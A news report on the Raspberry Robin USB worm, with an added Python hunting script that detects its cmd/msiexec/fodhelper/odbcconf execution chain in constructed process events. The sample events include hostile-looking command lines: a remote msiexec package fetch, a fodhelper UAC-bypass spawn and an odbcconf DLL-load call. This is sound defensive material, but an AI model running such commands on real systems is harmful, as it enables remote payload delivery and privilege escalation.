Microsoft says a Windows worm has recently been found on the networks of many organizations across a range of industry sectors.
Raspberry Robin is a worm that spreads through infected USB devices. It was first spotted by Red Canary intelligence analysts in September 2021.
Sekoia, a cybersecurity firm, also observed it using compromised QNAP NAS devices as command-and-control (C2) servers in November. Microsoft said it found malicious artifacts linked to the worm dating back to 2019.
Redmond's findings line up with those of Red Canary's Detection Engineering team, which also found the worm on multiple customers' networks, including some in the technology and manufacturing sectors.
Microsoft observed the malware connecting to addresses on the Tor network, but the threat actors have yet to exploit the access they gain to victims' networks.
That is despite the fact that they could easily escalate their attacks, since the malware can bypass User Account Control (UAC) on infected systems using legitimate Windows tools.
Microsoft shared this information in a private threat advisory available only to Microsoft Defender for Endpoint subscribers.
Abuses legitimate Windows tools to infect new devices
As mentioned above, Raspberry Robin spreads via infected USB drives that contain a malicious .LNK shortcut file.
Once the USB device is attached and the user opens the shortcut, the worm uses cmd.exe to spawn an msiexec process that launches a malicious file stored on the infected drive.
It infects Windows devices and communicates with its command-and-control (C2) servers to execute malicious payloads, using several legitimate Windows utilities:
1. fodhelper, a trusted, auto-elevating binary used to manage Features on Demand in Windows Settings (its auto-elevation is what makes it useful for bypassing UAC)
2. msiexec, the command-line component of Windows Installer, which can fetch and install a package from a remote URL as well as from a local path
3. odbcconf, the tool for configuring ODBC drivers and data sources, which can also be made to load an arbitrary DLL
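The execution chain described above (cmd.exe spawning msiexec against a file on the USB drive, msiexec reaching out to an external URL, fodhelper launched from an unusual parent, odbcconf loading a DLL) maps directly onto process-creation telemetry. The following is an added example, not Microsoft's or Red Canary's detection logic and not code from the original article: a small hunting script that runs four heuristics over constructed process-creation events. The field names mimic Sysmon Event ID 1 / EDR process-creation records, the assumption that C: is the system volume (so any other drive letter is treated as removable or non-system media), the list of "script host" parents, and every sample event and path are assumptions made for the example.

```python
"""Hunt heuristics for the Raspberry Robin style execution chain.

Added example: runs over constructed process-creation records (Sysmon
Event ID 1 style field names are an assumption, not the article's data).
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent_image: str   # full path of the parent process
    image: str          # full path of the created process
    command_line: str   # command line of the created process


URL_RE = re.compile(r"https?://\S+", re.I)
# Any drive letter other than C:. Assumes C: is the system volume, so
# D:..Z: are treated as removable or other non-system media (assumption).
NONSYSTEM_DRIVE_RE = re.compile(r"(?<![A-Za-z])[D-Zd-z]:\\")
# odbcconf /A {REGSVR <dll>} (or -a) makes odbcconf load the named DLL.
ODBCCONF_REGSVR_RE = re.compile(r"[/-]a\s*\{\s*regsvr\s+[^}]+\.dll\s*\}", re.I)
# Parents from which the auto-elevating fodhelper.exe should not normally
# be spawned (assumption; tune to the environment's baseline).
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "msiexec.exe", "rundll32.exe",
                "odbcconf.exe", "wscript.exe", "cscript.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> list[str]:
    """Return the list of heuristics an event triggers (empty if benign)."""
    img, parent, cmd = basename(ev.image), basename(ev.parent_image), ev.command_line
    hits = []
    if img == "msiexec.exe":
        if parent == "cmd.exe" and NONSYSTEM_DRIVE_RE.search(cmd):
            hits.append("T1: cmd.exe launched msiexec with a package on a non-system drive")
        if URL_RE.search(cmd):
            hits.append("T2: msiexec given an external URL (possible payload fetch or C2)")
    elif img == "fodhelper.exe" and parent in SCRIPT_HOSTS:
        hits.append(f"T3: auto-elevating fodhelper.exe spawned by {parent} (possible UAC bypass)")
    elif img == "odbcconf.exe" and ODBCCONF_REGSVR_RE.search(cmd):
        hits.append("T4: odbcconf.exe asked to load a DLL via REGSVR")
    return hits


def hunt(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Map event index -> triggered heuristics, for events that fired any."""
    return {i: h for i, ev in enumerate(events) if (h := classify(ev))}


# Constructed sample telemetry; paths and hosts are invented for the example.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
              r'cmd.exe /R start "" "E:\Removable.lnk"'),                 # benign by itself
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\msiexec.exe",
              r"msiexec /q /i E:\pkg.msi"),                                # T1
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\msiexec.exe",
              r"msiexec /q /i http://example.invalid:8080/pkg"),           # T2
    ProcEvent(r"C:\Windows\System32\msiexec.exe", r"C:\Windows\System32\fodhelper.exe",
              r"fodhelper.exe"),                                           # T3
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\odbcconf.exe",
              r"odbcconf /A {REGSVR C:\Users\Public\x.dll}"),              # T4
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\msiexec.exe",
              r"msiexec /i C:\Users\u\Downloads\tool.msi"),                # benign
]

if __name__ == "__main__":
    for idx, findings in hunt(SAMPLE_EVENTS).items():
        ev = SAMPLE_EVENTS[idx]
        print(f"[{idx}] {basename(ev.parent_image)} -> {ev.command_line}")
        for f in findings:
            print("     ", f)
```

Each heuristic on its own will produce false positives in a real estate (msiexec is routinely pointed at network shares, odbcconf is used by some installers), so the practical use is to correlate them: an msiexec launched from cmd.exe against a removable drive, followed within minutes by an outbound msiexec with a URL and a fodhelper or odbcconf child, is the sequence the article describes and is far more specific than any single event.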
Red Canary researchers noted that while msiexec.exe normally runs legitimate installer packages, adversaries can also use it to deliver malware.
"Raspberry Robin uses the msiexec.exe command to try to communicate with an external network to a malicious domain to perform C2 purposes."
Security researchers have found Raspberry Robin in the wild but have not yet attributed it to a threat group, and its intended target is still unknown.
Even so, Microsoft rated the campaign as high-risk because the attackers could install additional malware on victims' networks and escalate their privileges at any time.